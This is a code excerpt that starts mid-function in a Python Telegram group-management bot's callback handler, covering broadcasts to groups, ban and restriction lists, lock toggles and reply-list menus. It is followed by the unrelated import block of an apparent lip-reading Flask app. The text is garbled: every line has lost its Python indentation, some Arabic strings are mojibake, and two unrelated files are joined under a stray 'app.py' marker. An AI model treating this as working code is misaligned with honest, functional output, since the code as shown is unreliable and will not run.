Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if re.search("ShowO",date[0]):
T = date[0].replace("ShowO","")
rank = isrank(redis,userID,chatID)
if T == "lock":
reply_markup = getOR(rank,r,userID)
tx = r.LockO
if T == "admin":
reply_markup = getOR(rank,r,userID)
tx = r.AdminO
if T == "owner":
reply_markup = getOR(rank,r,userID)
tx = r.OwnerO
if T == "creator":
reply_markup = getOR(rank,r,userID)
tx = r.CreatorO
if T == "sudos":
reply_markup = getOR(rank,r,userID)
tx = r.SudosO
if T == "sudo":
reply_markup = getOR(rank,r,userID)
tx = r.SudoO
Bot("editMessageText",{"chat_id":chatID,"text":tx,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "sendtogroups":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoGP,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = Sendto(redis,callback_query,"groups")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoGP.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "sendtoprivates":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoPR,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = Sendto(redis,callback_query,"privates")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoPR.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "fwdtogroups":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoGP,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = fwdto(redis,callback_query,"groups")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoGP.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "fwdtoprivates":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoPR,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = fwdto(redis,callback_query,"privates")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoPR.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "kickme-yes":
Bot("kickChatMember",{"chat_id":chatID,"user_id":userID})
Bot("unbanChatMember",{"chat_id":chatID,"user_id":userID})
Bot("editMessageText",{"chat_id":chatID,"text":r.Dkickme,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "kickme-no":
Bot("editMessageText",{"chat_id":chatID,"text":r.Nkickme,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "delfromb":
Hash = date[1]
if Hash == "blockanimations":
ID = callback_query.message.animation.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chatId,TY),ID)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneUNblock,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "Blocklist":
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showBlocklist","",userID])),InlineKeyboardButton(c.STgifs,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockanimations")),],[InlineKeyboardButton(c.STphoto,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockphotos")),InlineKeyboardButton(c.STsticker,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockSTICKERs")),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.blocklist2,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "replylist":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showreplylist","",userID])),InlineKeyboardButton(c.STgifs,callback_data=json.dumps(["showGFreplylist","",userID])),],[InlineKeyboardButton(c.STvoice,callback_data=json.dumps(["showVOreplylist","",userID])),InlineKeyboardButton(c.STsticker,callback_data=json.dumps(["showSTreplylist","",userID])),],[InlineKeyboardButton("Mp3",callback_data=json.dumps(["showAUreplylist","",userID]))]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.replylist,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "replylistBOT":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showreplylistBOT","",userID])),InlineKeyboardButton(c.STgifs,callback_data=json.dumps(["showGFreplylistBOT","",userID])),],[InlineKeyboardButton(c.STvoice,callback_data=json.dumps(["showVOreplylistBOT","",userID])),InlineKeyboardButton(c.STsticker,callback_data=json.dumps(["showSTreplylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.replylistBot,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "alllist":
reply_markup=InlineKeyboardMarkup(
[[InlineKeyboardButton(c.STbanall,callback_data=json.dumps(["showbanall","",userID]))
,InlineKeyboardButton(c.STtkall,callback_data=json.dumps(["showtkall","",userID])),]
])
Bot("editMessageText",{"chat_id":chatID,"text":r.banlist,"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delallban":
redis.delete("{}Nbot:bans".format(BOT_ID))
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Ddelbanall,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delalltk":
redis.delete("{}Nbot:restricteds".format(BOT_ID))
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Ddeltkall,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "showBlocklist":
li = redis.smembers("{}Nbot:{}:blockTEXTs".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - "+word
i += 1
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.BlocklistRm,callback_data=json.dumps(["delListblockTEXTs","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["Blocklist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["Blocklist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.BlocklistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showbanall":
arrays = redis.smembers("{}Nbot:bans".format(BOT_ID))
if arrays:
b = BYusers(arrays,chatID,redis,client)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.allbandel,callback_data=json.dumps(["delallban","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":b,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup,"parse_mode":"markdown"})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.allbanE,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showtkall":
arrays = redis.smembers("{}Nbot:restricteds".format(BOT_ID))
if arrays:
b = BYusers(arrays,chatID,redis,client)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.alltkdel,callback_data=json.dumps(["delalltk","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":b,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup,"parse_mode":"markdown"})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.alltkE,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showreplylist":
li = redis.hkeys("{}Nbot:{}:TXreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"TXreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.replylistRm,callback_data=json.dumps(["delTXreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.replylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showAUreplylist":
li = redis.hkeys("{}Nbot:{}:AUreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("๐๊ ูุงุฆู
ุฉ ุงูุตูุชูุงุช ูุงุฑุบุฉ",callback_data=json.dumps(["delSTreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":"๐๊ ูุงุฆู
ุฉ ุงูุตูุชูุงุช ูุงุฑุบุฉ","message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showSTreplylist":
li = redis.hkeys("{}Nbot:{}:STreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.STreplylistRm,callback_data=json.dumps(["delSTreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.STreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showGFreplylist":
li = redis.hkeys("{}Nbot:{}:GFreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"GFreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.GFreplylistRm,callback_data=json.dumps(["delGFreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.GFreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showVOreplylist":
li = redis.hkeys("{}Nbot:{}:VOreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"VOreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.VOreplylistRm,callback_data=json.dumps(["delVOreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.VOreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showreplylistBOT":
li = redis.hkeys("{}Nbot:TXreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"TXreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.replylistRm,callback_data=json.dumps(["delTXreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.replylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showSTreplylistBOT":
li = redis.hkeys("{}Nbot:STreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.STreplylistRm,callback_data=json.dumps(["delSTreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.STreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showGFreplylistBOT":
li = redis.hkeys("{}Nbot:GFreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"GFreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.GFreplylistRm,callback_data=json.dumps(["delGFreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.GFreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showVOreplylistBOT":
li = redis.hkeys("{}Nbot:VOreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"VOreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.VOreplylistRm,callback_data=json.dumps(["delVOreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.VOreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "listCH":
if int(date[1]) != 4:
Bot("editMessageText",{"chat_id":chatID,"text":r.settings.format(title),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[1])),"parse_mode":"html"})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[3]))})
else:
T = (redis.hget("{}Nbot:time_ck".format(BOT_ID),chatID) or 3)
m = (redis.hget("{}Nbot:max_msg".format(BOT_ID),chatID) or 10)
Bot("editMessageText",{"chat_id":chatID,"text":r.st2.format(T,m),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[1])),"parse_mode":"html"})
if date[0] == "listCH-res":
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st_res(client, callback_query,redis,int(date[1]))})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[1]))})
if date[0] == 'LU-res':
d = date[1].split("-")
lock = d[0]
lockres = d[0]+":"+d[1]
if redis.sismember("{}Nbot:{}".format(BOT_ID,lockres),chatID):
redis.srem("{}Nbot:{}".format(BOT_ID,lockres),chatID)
else:
redis.sadd("{}Nbot:{}".format(BOT_ID,lockres),chatID)
redis.sadd("{}Nbot:{}".format(BOT_ID,lock),chatID)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st_res(client, callback_query,redis,int(date[3]))})
if date[0] == 'LU':
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
save = redis.srem("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
else:
save = redis.sadd("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
if int(date[3]) != 4:
Bot("editMessageText",{"chat_id":chatID,"text":r.settings.format(title),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[3])),"parse_mode":"html"})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[3]))})
else:
T = (redis.hget("{}Nbot:time_ck".format(BOT_ID),chatID) or 3)
m = (redis.hget("{}Nbot:max_msg".format(BOT_ID),chatID) or 10)
Bot("editMessageText",{"chat_id":chatID,"text":r.st2.format(T,m),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[3])),"parse_mode":"html"})
if date[0] == "delListblockTEXTs":
redis.delete("{}Nbot:{}:blockTEXTs".format(BOT_ID,chatID))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delListbans":
arrays = redis.smembers("{}Nbot:{}:bans".format(BOT_ID,chatID))
for user in arrays:
GetGprank = GPranks(user,chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":user})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),user)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delListrestricteds":
arrays = redis.smembers("{}Nbot:{}:restricteds".format(BOT_ID,chatID))
for user in arrays:
GetGprank = GPranks(user,chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": user,"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
redis.srem("{}Nbot:{}:restricteds".format(BOT_ID,chatID),user)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "LandU":
if date[3] == "LtoU":
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
redis.srem("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[3] == "UtoL":
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
redis.sadd("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "Corder":
if date[1] == "bans":
if date[4] == "UtoB":
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3]):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
GetGprank = GPranks(date[3],chatID)
if GetGprank == "kicked":
Bot("kickChatMember",{"chat_id":chatID,"user_id":date[3]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[4] == "BtoU":
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3]):
GetGprank = GPranks(date[3],chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":date[3]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[1] == "restricteds":
if date[4] == "UtoB":
if redis.sismember("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3]):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
GetGprank = GPranks(date[3],chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": date[3],"can_send_messages": 0,"can_send_media_messages": 0,"can_send_other_messages": 0,"can_send_polls": 0,"can_change_info": 0,"can_add_web_page_previews": 0,"can_pin_messages": 0,})
redis.sadd("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[4] == "BtoU":
if redis.sismember("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3]):
GetGprank = GPranks(date[3],chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": date[3],"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
redis.srem("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delList":
H = date[1]
if H != "sudos" and H != "creator":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if H == "sudos":
redis.delete("{}Nbot:sudos".format(BOT_ID))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if H == "creator":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
redis.setex("{}Nbot:{}:floodClick".format(BOT_ID,userID), 3, User_click+1)
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id})
elif int(date[2]) != userID:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.notforyou,"show_alert":True})
redis.setex("{}Nbot:{}:floodClick".format(BOT_ID,userID), 3, User_click+1)
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
|
app.py
|
import argparse
import time
import torch
import random
from tqdm import tqdm
import math
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import os
import numpy as np
import data_loader.datasets as module_data
import model.loss as module_loss
import model.metric as module_met
import model.model as module_arch
from torch.utils.data import DataLoader
from utils.util import canonical_state_dict_keys
from parse_config import ConfigParser
from model.metric import AverageMeter
from data_loader.datasets import DatasetV
from torch.utils.data.dataloader import default_collate
import sys
import json
import glob
from scipy.special import expit as sigmoid
from sklearn.metrics import average_precision_score
import pkg_resources
pkg_resources.require("matplotlib==3.2.0rc1")
import matplotlib.pyplot as plt
sys.setrecursionlimit(1500)
from flask import Flask, request, jsonify
from PIL import Image
import io
from base64 import encodebytes
import cv2
import editdistance
import tensorflow as tf
from tensorflow.keras.utils import Progbar
from datas.list_generator import ListGenerator
from language_model.char_rnn_lm import CharRnnLmWrapperSingleton
from lip_model.training_graph import TransformerTrainGraph
from lip_model.inference_graph import TransformerInferenceGraph
import json
import shutil
import threading
